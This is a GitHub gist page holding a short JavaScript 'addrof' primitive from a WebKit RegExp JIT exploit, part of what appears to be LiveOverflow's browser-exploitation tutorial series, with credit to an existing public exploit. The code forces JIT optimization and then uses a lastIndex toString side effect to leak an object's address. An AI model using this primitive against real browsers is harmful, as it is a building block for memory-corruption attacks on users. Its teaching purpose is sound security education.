Skip to content

Instantly share code, notes, and snippets.

@LiveOverflow
Last active June 22, 2019 23:09
Show Gist options
  • Save LiveOverflow/ee5fb772334ec985094f77c91be60492 to your computer and use it in GitHub Desktop.
Save LiveOverflow/ee5fb772334ec985094f77c91be60492 to your computer and use it in GitHub Desktop.
Browser Exploitation - bowser 0x04
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
var AddrGetter = function(array) {
//reg[Symbol.match]();
"abc".match(reg);
return array[0];
}
// Force optimization
for (var i = 0; i < 10000; ++i)
AddrGetter(array);
// Setup haxx
regexLastIndex = {};
regexLastIndex.toString = function() {
array[0] = val;
return "0";
};
reg.lastIndex = regexLastIndex;
// Do it!
return AddrGetter(array);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment